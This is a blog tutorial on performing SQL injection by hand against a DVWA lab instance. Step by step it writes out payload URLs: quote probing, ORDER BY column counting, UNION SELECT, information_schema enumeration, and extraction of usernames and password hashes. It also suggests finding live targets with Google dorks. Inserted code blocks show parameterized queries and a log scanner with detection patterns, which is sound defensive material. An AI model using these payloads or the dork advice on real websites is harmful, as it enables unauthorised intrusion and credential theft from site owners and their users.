How to Do SQL Injection Manually

Namaste Friends,



Today, in this post, I am going to show you how to manually perform SQL injection attacks on websites.

So, let's quickly start our tutorial.

What Is an SQL Injection Attack?


SQL injection is a type of vulnerability in a web application in which an attacker can insert different types of SQL statements, syntax and commands (commonly referred to as a malicious payload) and have those statements executed on the server.
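The difference between a query built by string concatenation and a parameterized one, shown with the values this tutorial later puts in ?id= (Steps 2 and 8). This is an added example, not code from this post or from DVWA; the SQLite table and its rows are constructed stand-ins for DVWA's MySQL users table.

```python
import sqlite3

def make_db():
    """Constructed stand-in for DVWA's users table (SQLite here, not MySQL)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, "
               "last_name TEXT, user TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?)", [
        (1, "admin", "admin", "admin", "<constructed-hash-1>"),
        (2, "Gordon", "Brown", "gordonb", "<constructed-hash-2>"),
    ])
    return db

def lookup_vulnerable(db, user_id):
    # The id is pasted into the SQL text: a quote in it closes the string
    # literal and whatever follows is parsed as SQL.
    sql = "SELECT first_name, last_name FROM users WHERE user_id = '" + user_id + "'"
    return db.execute(sql).fetchall()

def lookup_parameterized(db, user_id):
    # The id is bound as a value; the statement text never changes.
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return db.execute(sql, (user_id,)).fetchall()

def outcome(fn, db, user_id):
    """Rows returned, or 'sql-error' when the database rejects the statement."""
    try:
        return fn(db, user_id)
    except sqlite3.Error:
        return "sql-error"

# Values the tutorial puts in ?id= (Step 2 and Step 8), after URL decoding.
QUOTE_PROBE = "1'"
UNION_PAYLOAD = "1' UNION SELECT user, password FROM users -- "

if __name__ == "__main__":
    db = make_db()
    for value in ("1", QUOTE_PROBE, UNION_PAYLOAD):
        print(repr(value))
        print("  concatenated: ", outcome(lookup_vulnerable, db, value))
        print("  parameterized:", outcome(lookup_parameterized, db, value))
```

With the bound parameter, the quote probe and the UNION payload are compared as plain values and match no row, while a normal id still returns its record.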


Friends, for practice purposes I am using DVWA (Damn Vulnerable Web Application) on a local server, as you can see in the image below.

SQL Injection Manually Tutorial Steps

Step 1.

Our first step is to find a target URL on which to exploit the SQL vulnerability. Here, I am using the Metasploitable vulnerable machine as the target, but you can also find live targets with the help of Google dorks.

Target URL:

http://192.168.1.101/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#




Step 2.

Now, our second step is to verify that our selected target URL is vulnerable to SQL injection. For this, you just need to add a ' after the "=" sign or after the number in the URL's query.

After editing, our URL will look like this:


 http://192.168.1.101/dvwa/vulnerabilities/sqli/?id=1'&Submit=Submit#
or
 http://192.168.1.101/dvwa/vulnerabilities/sqli/?id='1&Submit=Submit#

After submitting the URL, if you get any type of SQL error message, then your selected target is vulnerable to SQL injection, as you can see in the screenshot below.




Step 3.

Now, we need to make our URL stable for injecting our SQL statements through it.
For this, you just need to add --+ or # after the ', which comments out the rest of the original query.

Then, our URL will look like this:

http://192.168.1.101/dvwa/vulnerabilities/sqli/?id=1'--+&Submit=Submit#

After submitting this URL, if the webpage does not show any type of error, our URL is now stable for injecting SQL queries.




Step 4.

Now, our next move is to find the total number of columns present in the current working table.
For this, we just need to add ' order by n, where n is a column number. Basically, we use incrementing values to guess the number of columns available in the table: we increase the column number one by one until the webpage returns an unknown column error, because that error lets us easily work out the number of columns present in the table. For example:


http://192.168.1.101/dvwa/vulnerabilities/sqli/?id=1' order by n --+&Submit=Submit#


http://192.168.1.101/dvwa/vulnerabilities/sqli/?id=1' order by 1 --+&Submit=Submit# --> No Error

http://192.168.1.101/dvwa/vulnerabilities/sqli/?id=1' order by 2 --+&Submit=Submit# --> No Error

http://192.168.1.101/dvwa/vulnerabilities/sqli/?id=1' order by 3 --+&Submit=Submit# --> Error

Here, as you can see, we get an error on column number 3, which means there are only 2 columns available in the table.





Step 5.

Now we know that there are 2 columns available in the table. So, our next step is to find the vulnerable column in MySQL. For this, we will put some values in place of the columns and check whether they appear in the webpage source.

For example:

http://192.168.1.101/dvwa/vulnerabilities/sqli/?id=1' UNION SELECT 111, 101 --+&Submit=Submit#

After submitting, pay attention to the webpage content and try to find our injected column values in it. As you can see in the screenshot below, both columns are vulnerable to SQL injection.




Step 6.

Now we know which column is vulnerable to SQL injection. So, let's use this vulnerable column to find the table names available in the current database.

To find all table names: http://192.168.1.101/dvwa/vulnerabilities/sqli/?id=1' UNION SELECT null, table_name FROM information_schema.tables --+&Submit=Submit#

To find the table names in the current database: http://192.168.1.101/dvwa/vulnerabilities/sqli/?id=1' UNION SELECT null, table_name FROM information_schema.tables WHERE table_schema=database() --+&Submit=Submit#

As you can see in the screenshot below, the webpage is showing the names of the tables available in the database.




Step 7.

Now we know which columns are vulnerable to SQL injection and the current table name. So, let's use this information to find the names of the columns available in the current database's tables.

To find all column names: http://192.168.1.101/dvwa/vulnerabilities/sqli/?id=1' UNION SELECT null, column_name FROM information_schema.columns WHERE table_schema=database() --+&Submit=Submit#

As you can see in the screenshot below, the webpage is showing the names of the columns available in the database.







Step 8.

Finally, to extract the user and password columns from the table, use the URL below.

URL: http://192.168.1.101/dvwa/vulnerabilities/sqli/?id=1' UNION SELECT user, password FROM users --+&Submit=Submit#






Done!
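From the defender's side, each step above leaves a recognisable request in the web server's access log. The following added example (not part of the original post; the log lines, client IPs and stage names are constructed) tags those requests by stage and reports clients that progress through several of them.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines: client IPs, timestamps and sizes are made up;
# the query strings are the Step 2-8 requests as a server would log them.
SAMPLE_LOG = """\
192.168.1.77 - - [10/Jan/2024:10:00:01 +0000] "GET /dvwa/vulnerabilities/sqli/?id=2&Submit=Submit HTTP/1.1" 200 4512
192.168.1.50 - - [10/Jan/2024:10:00:09 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%27&Submit=Submit HTTP/1.1" 200 161
192.168.1.50 - - [10/Jan/2024:10:00:31 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%27+order+by+3+--+&Submit=Submit HTTP/1.1" 200 170
192.168.1.50 - - [10/Jan/2024:10:01:02 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%27+UNION+SELECT+null,+table_name+FROM+information_schema.tables+--+&Submit=Submit HTTP/1.1" 200 9120
192.168.1.50 - - [10/Jan/2024:10:01:40 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%27+UNION+SELECT+user,+password+FROM+users+--+&Submit=Submit HTTP/1.1" 200 5230
"""

LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*" (\d{3}) ')
# One signature per stage of the walkthrough, matched on the decoded value.
STAGES = [
    ("quote-probe", re.compile(r"'")),
    ("order-by", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union-select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("schema-enum", re.compile(r"\binformation_schema\b", re.I)),
]

def stages_in(url):
    """Return the stage names whose signature matches any decoded query value."""
    values = [v for _, v in parse_qsl(urlsplit(url).query, keep_blank_values=True)]
    return [name for name, rx in STAGES if any(rx.search(v) for v in values)]

def scan(log_text):
    """Map client IP -> ordered list of distinct stages seen in its requests."""
    seen = {}
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        ip, url, _status = m.groups()
        for stage in stages_in(url):
            stages = seen.setdefault(ip, [])
            if stage not in stages:
                stages.append(stage)
    return seen

def escalating_clients(log_text, threshold=3):
    """Clients that hit several distinct stages: a walk-through, not a stray quote."""
    return sorted(ip for ip, s in scan(log_text).items() if len(s) >= threshold)
```

A lone quote in a parameter is common in legitimate input, which is why the report keys on a client reaching several stages rather than on any single match.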


Written By:
                 SSB










